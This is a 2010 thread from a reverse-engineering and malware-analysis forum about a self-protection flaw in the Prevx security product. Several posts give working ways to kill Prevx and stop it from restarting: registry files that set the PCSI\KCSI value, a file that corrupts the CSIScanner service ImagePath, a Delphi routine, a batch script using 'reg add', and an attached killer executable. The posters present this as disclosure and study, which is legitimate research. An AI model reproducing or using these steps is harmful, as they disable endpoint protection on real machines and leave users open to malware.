A forum for reverse engineering, OS internals and malware analysis 

All off-topic discussion goes here.
 #2949  by ssj100
 Wed Oct 06, 2010 6:19 pm
It's a marketing tactic haha. One reason why I don't have much respect for Prevx in general.
 #2993  by STRELiTZIA
 Sun Oct 10, 2010 7:53 am
Hi,

Prevx Registry value “KCSI” Exploit.


Prevx, trying to read the data contained in the registry value”\PCSI\KCSI”, and eventually make it null if it contains data different than zero.

Roots and keys:
Code: Select all
HKLM\SOFTWARE\PCSI\KCSI
 HKCU\Software\PCSI\KCSI
 HKU\.DEFAULT\Software\PCSI\KCSI
Code: Select all
Value         : KCSI
Data type     : REG_DWORD
Data value    : $00000001 
This value does not exist when you install Prevx, but he continually seeks it every time.

By changing the data stored in this value to “1”, Prevx was killed instantly, but Prevx processes resurrected.

To bypass resurrection, we can corrupt service or drivers keys values by synchronizing modification after the process is completed or using Loop to write "1" value every second.

Settings:
- Turn 'ON' Monitoring to get MAXIMUM Protection (this option prevents any Prevx registry keys malicious modification).


Use Windows registry file to add new values:

------ KillPrevxOneTime.reg --------
Code: Select all
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\PCSI]
"KCSI"=dword:00000001
--------- CorruptCSIScanner.reg ----------
Code: Select all
Windows Registry Editor Version 5.00

;Corrupt ImagePath to ""C:\Program Files\Prevx\prevx1.exe" /service";
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CSIScanner]
"ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,\
  6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,50,00,72,00,65,00,76,00,78,\
  00,5c,00,70,00,72,00,65,00,76,00,78,00,31,00,2e,00,65,00,78,00,65,00,22,00,\
  20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00
Launch” KillPrevxOneTime.reg” then “CorruptCSIScanner.reg”, you must synchronizing these operations.

Delphi part of code without optimization and checks:
Code: Select all
procedure KillPx();
var Reg: TRegistry;
begin
  Reg := TRegistry.Create;
  Reg.RootKey := HKEY_LOCAL_MACHINE;
  Reg.OpenKey('\SOFTWARE\PCSI', False);
  Reg.WriteInteger('KCSI', $00000001);

  Sleep(1500);

  Reg.OpenKey('\SYSTEM\CurrentControlSet\Services\CSIScanner', False);
  Reg.WriteExpandString('ImagePath', '"C:\Program Files\Prevx\prevx1.exe" /service');

  Reg.CloseKey;
  Reg.Free;
end;
Working application attached:
PxKiller.exe
KillPxOneTime.reg
CorruptCSIScanner.reg
Readme.txt


Regards.
Attachments
(40.96 KiB) Downloaded 33 times
 #2994  by EP_X0FF
 Sun Oct 10, 2010 8:37 am
LOL, product full of laughable beginner bugs.
 #2997  by ssj100
 Sun Oct 10, 2010 9:17 am
Nice, just tested it and Prevx is completely hosed haha. Since I know Prevx associates read this thread, may I respectfully suggest (once more) to think about implementing a HIPS component into your product.
 #3013  by STRELiTZIA
 Tue Oct 12, 2010 9:58 am
Triple Helix wrote:Fixed in 5 minutes! http://www.wilderssecurity.com/showpost ... ostcount=9

TH
Hello TH,
Happy for you :)
The bug is published to be fixed (this is not a personal attack against Prevx, it's just a subject for my studies)

But I noticed that the registry value remains active and still used to kill the process,
certainly it is a little better protected but still accessible and can be BYPASSED.

Regards.
 #3015  by STRELiTZIA
 Tue Oct 12, 2010 10:12 am
Yes, it will be convenient for Prevx, but for now I prefer to share information in public ...
may be in the future, who knows :)

because study a real case like Prevx is very interesting.
 #3030  by sparviero
 Wed Oct 13, 2010 10:02 pm
Hello TH,

Miserable, nothing has changed, continuing lies by Prevx. :mrgreen:
PxKiller.exe added to black-list how Medium Risk Malware, and here finsch.

Save this like *.bat file and run.
@echo off
reg add hklm\Software\PCSI /v KCSI /t REG_DWORD /d 1 /f
reg add hklm\SYSTEM\CurrentControlSet\Services\CSIScanner /v ImagePath /t
REG_EXPAND_SZ /d ""%%ProgramFiles%%\Prevx\prevx1.exe" /service" /f
Prevx is completely hosed ! (nothing alert-Medium Risk Malware) lol
If you like continue play with this miserable coded software,

Save this like *:*.bat file and run.
@echo off
reg add hklm\Software\PCSI /v KCSI /t REG_DWORD /d 0 /f
reg add hklm\SYSTEM\CurrentControlSet\Services\CSIScanner /v ImagePath /t
REG_EXPAND_SZ /d ""%%ProgramFiles%%\Prevx\prevx.exe" /service" /f
Prevx returns to normal, and you can expect to be protected! :lol:
 #3036  by EP_X0FF
 Thu Oct 14, 2010 8:56 am
While running for self-protection recovery Prevx created perfect BSOD generation software in build 209.

INVALID_KERNEL_HANDLE blue screen of death by just few clicks :)